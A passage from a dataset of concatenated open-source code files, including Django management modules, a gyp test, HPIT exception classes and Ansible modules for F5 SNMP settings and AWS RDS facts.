assert dt.tzinfo is self
# Find first Sunday in April & the last in October.
start = first_sunday_on_or_after(DSTSTART.replace(year=dt.year))
end = first_sunday_on_or_after(DSTEND.replace(year=dt.year))
# Can't compare naive to aware objects, so strip the timezone from
# dt first.
if start <= dt.replace(tzinfo=None) < end:
return HOUR
else:
return ZERO
Eastern = USTimeZone(-5, "Eastern", "EST", "EDT")
Central = USTimeZone(-6, "Central", "CST", "CDT")
Mountain = USTimeZone(-7, "Mountain", "MST", "MDT")
Pacific = USTimeZone(-8, "Pacific", "PST", "PDT")
| agpl-3.0 |
izonder/intellij-community | python/lib/Lib/site-packages/django/contrib/auth/management/__init__.py | 126 | 2854 | """
Creates permissions for all installed apps that need permissions.
"""
from django.contrib.auth import models as auth_app
from django.db.models import get_models, signals
def _get_permission_codename(action, opts):
return u'%s_%s' % (action, opts.object_name.lower())
def _get_all_permissions(opts):
"Returns (codename, name) for all permissions in the given opts."
perms = []
for action in ('add', 'change', 'delete'):
perms.append((_get_permission_codename(action, opts), u'Can %s %s' % (action, opts.verbose_name_raw)))
return perms + list(opts.permissions)
def create_permissions(app, created_models, verbosity, **kwargs):
from django.contrib.contenttypes.models import ContentType
app_models = get_models(app)
# This will hold the permissions we're looking for as
# (content_type, (codename, name))
searched_perms = list()
# The codenames and ctypes that should exist.
ctypes = set()
for klass in app_models:
ctype = ContentType.objects.get_for_model(klass)
ctypes.add(ctype)
for perm in _get_all_permissions(klass._meta):
searched_perms.append((ctype, perm))
# Find all the Permissions that have a context_type for a model we're
# looking for. We don't need to check for codenames since we already have
# a list of the ones we're going to create.
all_perms = set(auth_app.Permission.objects.filter(
content_type__in=ctypes,
).values_list(
"content_type", "codename"
))
for ctype, (codename, name) in searched_perms:
# If the permissions exists, move on.
if (ctype.pk, codename) in all_perms:
continue
p = auth_app.Permission.objects.create(
codename=codename,
name=name,
content_type=ctype
)
if verbosity >= 2:
print "Adding permission '%s'" % p
def create_superuser(app, created_models, verbosity, **kwargs):
from django.core.management import call_command
if auth_app.User in created_models and kwargs.get('interactive', True):
msg = ("\nYou just installed Django's auth system, which means you "
"don't have any superusers defined.\nWould you like to create one "
"now? (yes/no): ")
confirm = raw_input(msg)
while 1:
if confirm not in ('yes', 'no'):
confirm = raw_input('Please enter either "yes" or "no": ')
continue
if confirm == 'yes':
call_command("createsuperuser", interactive=True)
break
signals.post_syncdb.connect(create_permissions,
dispatch_uid = "django.contrib.auth.management.create_permissions")
signals.post_syncdb.connect(create_superuser,
sender=auth_app, dispatch_uid = "django.contrib.auth.management.create_superuser")
| apache-2.0 |
blighj/django | django/core/management/__init__.py | 20 | 14603 | import functools
import os
import pkgutil
import sys
from collections import OrderedDict, defaultdict
from importlib import import_module
import django
from django.apps import apps
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.management.base import (
BaseCommand, CommandError, CommandParser, handle_default_options,
)
from django.core.management.color import color_style
from django.utils import autoreload
from django.utils.encoding import force_text
def find_commands(management_dir):
"""
Given a path to a management directory, return a list of all the command
names that are available.
"""
command_dir = os.path.join(management_dir, 'commands')
return [name for _, name, is_pkg in pkgutil.iter_modules([command_dir])
if not is_pkg and not name.startswith('_')]
def load_command_class(app_name, name):
"""
Given a command name and an application name, return the Command
class instance. Allow all errors raised by the import process
(ImportError, AttributeError) to propagate.
"""
module = import_module('%s.management.commands.%s' % (app_name, name))
return module.Command()
@functools.lru_cache(maxsize=None)
def get_commands():
"""
Return a dictionary mapping command names to their callback applications.
Look for a management.commands package in django.core, and in each
installed application -- if a commands package exists, register all
commands in that package.
Core commands are always included. If a settings module has been
specified, also include user-defined commands.
The dictionary is in the format {command_name: app_name}. Key-value
pairs from this dictionary can then be used in calls to
load_command_class(app_name, command_name)
If a specific version of a command must be loaded (e.g., with the
startapp command), the instantiated module can be placed in the
dictionary in place of the application name.
The dictionary is cached on the first call and reused on subsequent
calls.
"""
commands = {name: 'django.core' for name in find_commands(__path__[0])}
if not settings.configured:
return commands
for app_config in reversed(list(apps.get_app_configs())):
path = os.path.join(app_config.path, 'management')
commands.update({name: app_config.name for name in find_commands(path)})
return commands
def call_command(command_name, *args, **options):
"""
Call the given command, with the given options and args/kwargs.
This is the primary API you should use for calling specific commands.
`name` may be a string or a command object. Using a string is preferred
unless the command object is required for further processing or testing.
Some examples:
call_command('migrate')
call_command('shell', plain=True)
call_command('sqlmigrate', 'myapp')
from django.core.management.commands import flush
cmd = flush.Command()
call_command(cmd, verbosity=0, interactive=False)
# Do something with cmd ...
"""
if isinstance(command_name, BaseCommand):
# Command object passed in.
command = command_name
command_name = command.__class__.__module__.split('.')[-1]
else:
# Load the command object by name.
try:
app_name = get_commands()[command_name]
except KeyError:
raise CommandError("Unknown command: %r" % command_name)
if isinstance(app_name, BaseCommand):
# If the command is already loaded, use it directly.
command = app_name
else:
command = load_command_class(app_name, command_name)
# Simulate argument parsing to get the option defaults (see #10080 for details).
parser = command.create_parser('', command_name)
# Use the `dest` option name from the parser option
opt_mapping = {
min(s_opt.option_strings).lstrip('-').replace('-', '_'): s_opt.dest
for s_opt in parser._actions if s_opt.option_strings
}
arg_options = {opt_mapping.get(key, key): value for key, value in options.items()}
defaults = parser.parse_args(args=[force_text(a) for a in args])
defaults = dict(defaults._get_kwargs(), **arg_options)
# Move positional args out of options to mimic legacy optparse
args = defaults.pop('args', ())
if 'skip_checks' not in options:
defaults['skip_checks'] = True
return command.execute(*args, **defaults)
class ManagementUtility:
"""
Encapsulate the logic of the django-admin and manage.py utilities.
"""
def __init__(self, argv=None):
self.argv = argv or sys.argv[:]
self.prog_name = os.path.basename(self.argv[0])
self.settings_exception = None
def main_help_text(self, commands_only=False):
"""Return the script's main help text, as a string."""
if commands_only:
usage = sorted(get_commands().keys())
else:
usage = [
"",
"Type '%s help <subcommand>' for help on a specific subcommand." % self.prog_name,
"",
"Available subcommands:",
]
commands_dict = defaultdict(lambda: [])
for name, app in get_commands().items():
if app == 'django.core':
app = 'django'
else:
app = app.rpartition('.')[-1]
commands_dict[app].append(name)
style = color_style()
for app in sorted(commands_dict.keys()):
usage.append("")
usage.append(style.NOTICE("[%s]" % app))
for name in sorted(commands_dict[app]):
usage.append(" %s" % name)
# Output an extra note if settings are not properly configured
if self.settings_exception is not None:
usage.append(style.NOTICE(
"Note that only Django core commands are listed "
"as settings are not properly configured (error: %s)."
% self.settings_exception))
return '\n'.join(usage)
def fetch_command(self, subcommand):
"""
Try to fetch the given subcommand, printing a message with the
appropriate command called from the command line (usually
"django-admin" or "manage.py") if it can't be found.
"""
# Get commands outside of try block to prevent swallowing exceptions
commands = get_commands()
try:
app_name = commands[subcommand]
except KeyError:
if os.environ.get('DJANGO_SETTINGS_MODULE'):
# If `subcommand` is missing due to misconfigured settings, the
# following line will retrigger an ImproperlyConfigured exception
# (get_commands() swallows the original one) so the user is
# informed about it.
settings.INSTALLED_APPS
else:
sys.stderr.write("No Django settings specified.\n")
sys.stderr.write(
"Unknown command: %r\nType '%s help' for usage.\n"
% (subcommand, self.prog_name)
)
sys.exit(1)
if isinstance(app_name, BaseCommand):
# If the command is already loaded, use it directly.
klass = app_name
else:
klass = load_command_class(app_name, subcommand)
return klass
def autocomplete(self):
"""
Output completion suggestions for BASH.
The output of this function is passed to BASH's `COMREPLY` variable and
treated as completion suggestions. `COMREPLY` expects a space
separated string as the result.
The `COMP_WORDS` and `COMP_CWORD` BASH environment variables are used
to get information about the cli input. Please refer to the BASH
man-page for more information about this variables.
Subcommand options are saved as pairs. A pair consists of
the long option string (e.g. '--exclude') and a boolean
value indicating if the option requires arguments. When printing to
stdout, an equal sign is appended to options which require arguments.
Note: If debugging this function, it is recommended to write the debug
output in a separate file. Otherwise the debug output will be treated
and formatted as potential completion suggestions.
"""
# Don't complete if user hasn't sourced bash_completion file.
if 'DJANGO_AUTO_COMPLETE' not in os.environ:
return
cwords = os.environ['COMP_WORDS'].split()[1:]
cword = int(os.environ['COMP_CWORD'])
try:
curr = cwords[cword - 1]
except IndexError:
curr = ''
subcommands = list(get_commands()) + ['help']
options = [('--help', False)]
# subcommand
if cword == 1:
print(' '.join(sorted(filter(lambda x: x.startswith(curr), subcommands))))
# subcommand options
# special case: the 'help' subcommand has no options
elif cwords[0] in subcommands and cwords[0] != 'help':
subcommand_cls = self.fetch_command(cwords[0])
# special case: add the names of installed apps to options
if cwords[0] in ('dumpdata', 'sqlmigrate', 'sqlsequencereset', 'test'):
try:
app_configs = apps.get_app_configs()
# Get the last part of the dotted path as the app name.
options.extend((app_config.label, 0) for app_config in app_configs)
except ImportError:
# Fail silently if DJANGO_SETTINGS_MODULE isn't set. The
# user will find out once they execute the command.
pass
parser = subcommand_cls.create_parser('', cwords[0])
options.extend(
(min(s_opt.option_strings), s_opt.nargs != 0)
for s_opt in parser._actions if s_opt.option_strings
)
# filter out previously specified options from available options
prev_opts = {x.split('=')[0] for x in cwords[1:cword - 1]}
options = (opt for opt in options if opt[0] not in prev_opts)
# filter options by current input
options = sorted((k, v) for k, v in options if k.startswith(curr))
for opt_label, require_arg in options:
# append '=' to options which require args
if require_arg:
opt_label += '='
print(opt_label)
# Exit code of the bash completion function is never passed back to
# the user, so it's safe to always exit with 0.
# For more details see #25420.
sys.exit(0)
def execute(self):
"""
Given the command-line arguments, figure out which subcommand is being
run, create a parser appropriate to that command, and run it.
"""
try:
subcommand = self.argv[1]
except IndexError:
subcommand = 'help' # Display help if no arguments were given.
# Preprocess options to extract --settings and --pythonpath.
# These options could affect the commands that are available, so they
# must be processed early.
parser = CommandParser(None, usage="%(prog)s subcommand [options] [args]", add_help=False)
parser.add_argument('--settings')
parser.add_argument('--pythonpath')
parser.add_argument('args', nargs='*') # catch-all
try:
options, args = parser.parse_known_args(self.argv[2:])
handle_default_options(options)
except CommandError:
pass # Ignore any option errors at this point.
try:
settings.INSTALLED_APPS
except ImproperlyConfigured as exc:
self.settings_exception = exc
if settings.configured:
# Start the auto-reloading dev server even if the code is broken.
# The hardcoded condition is a code smell but we can't rely on a
# flag on the command class because we haven't located it yet.
if subcommand == 'runserver' and '--noreload' not in self.argv:
try:
autoreload.check_errors(django.setup)()
except Exception:
# The exception will be raised later in the child process
# started by the autoreloader. Pretend it didn't happen by
# loading an empty list of applications.
apps.all_models = defaultdict(OrderedDict)
apps.app_configs = OrderedDict()
apps.apps_ready = apps.models_ready = apps.ready = True
# Remove options not compatible with the built-in runserver
# (e.g. options for the contrib.staticfiles' runserver).
# Changes here require manually testing as described in
# #27522.
_parser = self.fetch_command('runserver').create_parser('django', 'runserver')
_options, _args = _parser.parse_known_args(self.argv[2:])
for _arg in _args:
self.argv.remove(_arg)
# In all other cases, django.setup() is required to succeed.
else:
django.setup()
self.autocomplete()
if subcommand == 'help':
if '--commands' in args:
sys.stdout.write(self.main_help_text(commands_only=True) + '\n')
elif len(options.args) < 1:
sys.stdout.write(self.main_help_text() + '\n')
else:
self.fetch_command(options.args[0]).print_help(self.prog_name, options.args[0])
# Special-cases: We want 'django-admin --version' and
# 'django-admin --help' to work, for backwards compatibility.
elif subcommand == 'version' or self.argv[1:] == ['--version']:
sys.stdout.write(django.get_version() + '\n')
elif self.argv[1:] in (['--help'], ['-h']):
sys.stdout.write(self.main_help_text() + '\n')
else:
self.fetch_command(subcommand).run_from_argv(self.argv)
def execute_from_command_line(argv=None):
"""Run a ManagementUtility."""
utility = ManagementUtility(argv)
utility.execute()
| bsd-3-clause |
hhru/pycerberus-deb | tests/extend_schemas_test.py | 2 | 3775 | # -*- coding: UTF-8 -*-
#
# The MIT License
#
# Copyright (c) 2010 Felix Schwarz <felix.schwarz@oss.schwarz.eu>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from pycerberus.api import Validator
from pycerberus.compat import set
from pycerberus.lib import PythonicTestCase
from pycerberus.schema import SchemaValidator
from pycerberus.validators import StringValidator
class ExtendSchemaTest(PythonicTestCase):
class BasicSchema(SchemaValidator):
id = Validator()
formvalidators = (Validator(), )
def schema_class(self):
return self.__class__.BasicSchema
def schema(self):
return self.schema_class()()
def known_fields(self, schema):
return set(schema.fieldvalidators().keys())
# test functions
def test_can_add_additional_validators_to_existing_schema(self):
schema = self.schema()
extended_schema = SchemaValidator()
extended_schema.add('name', StringValidator())
extended_schema.add_missing_validators(schema)
self.assert_equals(set(['id', 'name']), self.known_fields(extended_schema))
self.assert_length(1, schema.formvalidators())
def test_existing_keys_are_kept(self):
schema = self.schema()
extended_schema = SchemaValidator()
extended_schema.add('id', StringValidator())
extended_schema.add_missing_validators(schema)
self.assert_equals(set(['id']), self.known_fields(schema))
self.assert_isinstance(extended_schema.validator_for('id'), StringValidator)
def test_adding_validators_appends_formvalidators(self):
schema = self.schema()
extended_schema = SchemaValidator()
extended_schema.add('id', StringValidator())
extended_schema.add_formvalidator(StringValidator())
extended_schema.add_missing_validators(schema)
self.assert_length(2, extended_schema.formvalidators())
def test_can_add_validators_from_schema_in_a_declarative_way(self):
class ExtendedSchema(self.schema_class()):
name = StringValidator()
formvalidators = (StringValidator(), )
extended_schema = ExtendedSchema()
self.assert_equals(set(['id', 'name']), self.known_fields(extended_schema))
self.assert_length(2, extended_schema.formvalidators())
self.assert_isinstance(extended_schema.formvalidators()[1], StringValidator)
def test_existing_names_from_superclass_are_replaced(self):
class ExtendedSchema(self.schema_class()):
id = StringValidator()
extended_schema = ExtendedSchema()
self.assert_isinstance(extended_schema.validator_for('id'), StringValidator)
| mit |
Connexions/cnx-upgrade | cnxupgrade/upgrades/migrate_hit_counts/migration.py | 1 | 2971 | # -*- coding: utf-8 -*-
# ###
# Copyright (c) 2013, Rice University
# This software is subject to the provisions of the GNU Affero General
# Public License version 3 (AGPLv3).
# See LICENCE.txt for details.
# ###
"""\
Migrates hit counts from legacy to cnx-archive's database at
schema version 1.
"""
import os
import sys
import csv
import argparse
from datetime import datetime, timedelta
import psycopg2
__all__ = ('cli_loader', 'do_migration',)
here = os.path.abspath(os.path.dirname(__file__))
RESOURCES_DIRECTORY = os.path.join(here, 'resources')
EXTRACTION_SCRIPT_PATH = os.path.join(RESOURCES_DIRECTORY, 'hit_extractor.py')
def get_ident(legacy_id, cursor):
cursor.execute("SELECT module_ident FROM latest_modules "
"WHERE moduleid = %s", (legacy_id,))
try:
ident = cursor.fetchone()[0]
except TypeError: # None
ident = None
return ident
def do_migration(hits, db_connection):
"""Given a list of hit objects migrate them to the SQL document_hits
table.
"""
with db_connection.cursor() as cursor:
for legacy_id, info in hits:
document_id = get_ident(legacy_id, cursor)
if document_id is None:
continue
past_hits, recent_hits, start, end, interval = info
start = datetime.fromtimestamp(start)
end = datetime.fromtimestamp(end)
interval = timedelta(seconds=interval)
if start < end - interval and (past_hits - recent_hits) > 0:
# Insert past hits
payload = (document_id, start, end - interval,
past_hits - recent_hits,)
cursor.execute("INSERT into document_hits "
"VALUES (%s, %s, %s, %s)",
payload)
# Insert recent hits
start = start > end - interval and start or end - interval
payload = (document_id, start, end, recent_hits,)
cursor.execute("INSERT into document_hits "
"VALUES (%s, %s, %s, %s)",
payload)
# Lastly, update the optimization tables.
cursor.execute("SELECT update_hit_ranks();")
db_connection.commit()
def cli_command(**kwargs):
"""The command used by the CLI to invoke the upgrade logic."""
connection_string = kwargs['db_conn_str']
input = kwargs['input']
hits = [(row[0], [int(x) for x in row[1:]],) for row in csv.reader(input)]
with psycopg2.connect(connection_string) as db_connection:
do_migration(hits, db_connection)
def cli_loader(parser):
"""Used to load the CLI toggles and switches."""
parser.add_argument('--input', type=argparse.FileType('r'),
default=sys.stdin,
help="CSV extracted using '{}' on the zope instance" \
.format(EXTRACTION_SCRIPT_PATH))
return cli_command
| agpl-3.0 |
sanyaade-teachings/gyp | test/mac/gyptest-strip-default.py | 232 | 2448 | #!/usr/bin/env python
# Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that the default STRIP_STYLEs match between different generators.
"""
import TestGyp
import re
import subprocess
import sys
import time
if sys.platform == 'darwin':
test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'])
CHDIR='strip'
test.run_gyp('test-defaults.gyp', chdir=CHDIR)
test.build('test-defaults.gyp', test.ALL, chdir=CHDIR)
# Lightweight check if stripping was done.
def OutPath(s):
return test.built_file_path(s, chdir=CHDIR)
def CheckNsyms(p, o_expected):
proc = subprocess.Popen(['nm', '-aU', p], stdout=subprocess.PIPE)
o = proc.communicate()[0]
# Filter out mysterious "00 0000 OPT radr://5614542" symbol which
# is apparently only printed on the bots (older toolchain?).
# Yes, "radr", not "rdar".
o = ''.join(filter(lambda s: 'radr://5614542' not in s, o.splitlines(True)))
o = o.replace('A', 'T')
o = re.sub(r'^[a-fA-F0-9]+', 'XXXXXXXX', o, flags=re.MULTILINE)
assert not proc.returncode
if o != o_expected:
print 'Stripping: Expected symbols """\n%s""", got """\n%s"""' % (
o_expected, o)
test.fail_test()
CheckNsyms(OutPath('libsingle_dylib.dylib'),
"""\
XXXXXXXX S _ci
XXXXXXXX S _i
XXXXXXXX T _the_function
XXXXXXXX t _the_hidden_function
XXXXXXXX T _the_used_function
XXXXXXXX T _the_visible_function
""")
CheckNsyms(OutPath('single_so.so'),
"""\
XXXXXXXX S _ci
XXXXXXXX S _i
XXXXXXXX T _the_function
XXXXXXXX t _the_hidden_function
XXXXXXXX T _the_used_function
XXXXXXXX T _the_visible_function
""")
CheckNsyms(OutPath('single_exe'),
"""\
XXXXXXXX T __mh_execute_header
""")
CheckNsyms(test.built_file_path(
'bundle_dylib.framework/Versions/A/bundle_dylib', chdir=CHDIR),
"""\
XXXXXXXX S _ci
XXXXXXXX S _i
XXXXXXXX T _the_function
XXXXXXXX t _the_hidden_function
XXXXXXXX T _the_used_function
XXXXXXXX T _the_visible_function
""")
CheckNsyms(test.built_file_path(
'bundle_so.bundle/Contents/MacOS/bundle_so', chdir=CHDIR),
"""\
XXXXXXXX S _ci
XXXXXXXX S _i
XXXXXXXX T _the_function
XXXXXXXX T _the_used_function
XXXXXXXX T _the_visible_function
""")
CheckNsyms(test.built_file_path(
'bundle_exe.app/Contents/MacOS/bundle_exe', chdir=CHDIR),
"""\
XXXXXXXX T __mh_execute_header
""")
test.pass_test()
| bsd-3-clause |
adlnet/HPIT-python-client | hpitclient/exceptions.py | 2 | 1439 | class ConnectionError(Exception):
"""
This exception indicates a generic HPIT connection problem.
"""
class AuthenticationError(Exception):
"""
This exception raised on HPIT 403.
"""
pass
class AuthorizationError(Exception):
"""
This exception is raised when you've made an authorization grant request
when you are not the owner of the message type or resource.
"""
pass
class ResourceNotFoundError(Exception):
"""
This exception raised on HPIT 403.
"""
pass
class InternalServerError(Exception):
"""
This exception raised on HPIT 500.
"""
pass
class PluginRegistrationError(Exception):
"""
This exception indicates that a plugin could not register with HPIT.
"""
pass
class PluginPollError(Exception):
"""
This exception indicates that a plugin could not poll HPIT.
"""
pass
class ResponseDispatchError(Exception):
"""
This exception indicates that a response from HPIT could not be dispatched to a callback.
"""
pass
class InvalidMessageNameException(Exception):
"""
This exception is raised when a user attempts to use a system message name, like 'transaction'.
"""
class InvalidParametersError(Exception):
"""
You haven't met the requirements for this function.
"""
class BadCallbackException(Exception):
"""
Raised when a callback is not callable
"""
| mit |
EvanK/ansible | lib/ansible/modules/network/f5/bigip_snmp.py | 14 | 13143 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_snmp
short_description: Manipulate general SNMP settings on a BIG-IP
description:
- Manipulate general SNMP settings on a BIG-IP.
version_added: 2.4
options:
allowed_addresses:
description:
- Configures the IP addresses of the SNMP clients from which the snmpd
daemon accepts requests.
- This value can be hostnames, IP addresses, or IP networks.
- You may specify a single list item of C(default) to set the value back
to the system's default of C(127.0.0.0/8).
- You can remove all allowed addresses by either providing the word C(none), or
by providing the empty string C("").
version_added: 2.6
contact:
description:
- Specifies the name of the person who administers the SNMP
service for this system.
agent_status_traps:
description:
- When C(enabled), ensures that the system sends a trap whenever the
SNMP agent starts running or stops running. This is usually enabled
by default on a BIG-IP.
choices:
- enabled
- disabled
agent_authentication_traps:
description:
- When C(enabled), ensures that the system sends authentication warning
traps to the trap destinations. This is usually disabled by default on
a BIG-IP.
choices:
- enabled
- disabled
device_warning_traps:
description:
- When C(enabled), ensures that the system sends device warning traps
to the trap destinations. This is usually enabled by default on a
BIG-IP.
choices:
- enabled
- disabled
location:
description:
- Specifies the description of this system's physical location.
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Set snmp contact
bigip_snmp:
contact: Joe User
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Set snmp location
bigip_snmp:
location: US West 1
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
agent_status_traps:
description: Value that the agent status traps was set to.
returned: changed
type: str
sample: enabled
agent_authentication_traps:
description: Value that the authentication status traps was set to.
returned: changed
type: str
sample: enabled
device_warning_traps:
description: Value that the warning status traps was set to.
returned: changed
type: str
sample: enabled
contact:
description: The new value for the person who administers SNMP on the device.
returned: changed
type: str
sample: Joe User
location:
description: The new value for the system's physical location.
returned: changed
type: str
sample: US West 1a
allowed_addresses:
description: The new allowed addresses for SNMP client connections.
returned: changed
type: list
sample: ['127.0.0.0/8', 'foo.bar.com', '10.10.10.10']
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import string_types
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import transform_name
from library.module_utils.network.f5.common import exit_json
from library.module_utils.network.f5.common import fail_json
from library.module_utils.compat.ipaddress import ip_network
from library.module_utils.network.f5.common import is_valid_hostname
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import transform_name
from ansible.module_utils.network.f5.common import exit_json
from ansible.module_utils.network.f5.common import fail_json
from ansible.module_utils.compat.ipaddress import ip_network
from ansible.module_utils.network.f5.common import is_valid_hostname
class Parameters(AnsibleF5Parameters):
api_map = {
'agentTrap': 'agent_status_traps',
'authTrap': 'agent_authentication_traps',
'bigipTraps': 'device_warning_traps',
'sysLocation': 'location',
'sysContact': 'contact',
'allowedAddresses': 'allowed_addresses',
}
updatables = [
'agent_status_traps',
'agent_authentication_traps',
'device_warning_traps',
'location',
'contact',
'allowed_addresses',
]
returnables = [
'agent_status_traps',
'agent_authentication_traps',
'device_warning_traps',
'location', 'contact',
'allowed_addresses',
]
api_attributes = [
'agentTrap',
'authTrap',
'bigipTraps',
'sysLocation',
'sysContact',
'allowedAddresses',
]
class ApiParameters(Parameters):
@property
def allowed_addresses(self):
if self._values['allowed_addresses'] is None:
return None
result = list(set(self._values['allowed_addresses']))
result.sort()
return result
class ModuleParameters(Parameters):
@property
def allowed_addresses(self):
if self._values['allowed_addresses'] is None:
return None
result = []
addresses = self._values['allowed_addresses']
if isinstance(addresses, string_types):
if addresses in ['', 'none']:
return []
else:
addresses = [addresses]
if len(addresses) == 1 and addresses[0] in ['default', '']:
result = ['127.0.0.0/8']
return result
for address in addresses:
try:
# Check for valid IPv4 or IPv6 entries
ip_network(u'%s' % str(address))
result.append(address)
except ValueError:
# else fallback to checking reasonably well formatted hostnames
if is_valid_hostname(address):
result.append(str(address))
continue
raise F5ModuleError(
"The provided 'allowed_address' value {0} is not a valid IP or hostname".format(address)
)
result = list(set(result))
result.sort()
return result
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
except Exception:
pass
return result
class UsableChanges(Changes):
pass
class ReportableChanges(Changes):
pass
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
def compare(self, param):
try:
result = getattr(self, param)
return result
except AttributeError:
return self.__default(param)
def __default(self, param):
attr1 = getattr(self.want, param)
try:
attr2 = getattr(self.have, param)
if attr1 != attr2:
return attr1
except AttributeError:
return attr1
@property
def allowed_addresses(self):
if self.want.allowed_addresses is None:
return None
if self.have.allowed_addresses is None:
if self.want.allowed_addresses:
return self.want.allowed_addresses
return None
want = set(self.want.allowed_addresses)
have = set(self.have.allowed_addresses)
if want != have:
result = list(want)
result.sort()
return result
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.have = ApiParameters()
self.want = ModuleParameters(params=self.module.params)
self.changes = UsableChanges()
def _update_changed_options(self):
diff = Difference(self.want, self.have)
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def exec_module(self):
result = dict()
changed = self.update()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def read_current_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/sys/snmp/".format(
self.client.provider['server'],
self.client.provider['server_port'],
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return ApiParameters(params=response)
def update_on_device(self):
params = self.changes.api_params()
uri = "https://{0}:{1}/mgmt/tm/sys/snmp/".format(
self.client.provider['server'],
self.client.provider['server_port'],
)
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
self.choices = ['enabled', 'disabled']
argument_spec = dict(
contact=dict(),
agent_status_traps=dict(
choices=self.choices
),
agent_authentication_traps=dict(
choices=self.choices
),
device_warning_traps=dict(
choices=self.choices
),
location=dict(),
allowed_addresses=dict(type='raw')
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode
)
client = F5RestClient(**module.params)
try:
mm = ModuleManager(module=module, client=client)
results = mm.exec_module()
cleanup_tokens(client)
exit_json(module, results, client)
except F5ModuleError as ex:
cleanup_tokens(client)
fail_json(module, ex, client)
if __name__ == '__main__':
main()
| gpl-3.0 |
alexlo03/ansible | lib/ansible/modules/cloud/amazon/rds_instance_facts.py | 27 | 12113 | #!/usr/bin/python
# Copyright (c) 2017, 2018 Michael De La Rue
# Copyright (c) 2017, 2018 Will Thames
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: rds_instance_facts
version_added: "2.6"
short_description: obtain facts about one or more RDS instances
description:
- obtain facts about one or more RDS instances
options:
db_instance_identifier:
description:
- The RDS instance's unique identifier.
required: false
aliases:
- id
filters:
description:
- A filter that specifies one or more DB instances to describe.
See U(https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html)
requirements:
- "python >= 2.7"
- "boto3"
author:
- "Will Thames (@willthames)"
- "Michael De La Rue (@mikedlr)"
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Get facts about an instance
- rds_instance_facts:
db_instance_identifier: new-database
register: new_database_facts
# Get all RDS instances
- rds_instance_facts:
'''
RETURN = '''
instances:
description: List of RDS instances
returned: always
type: complex
contains:
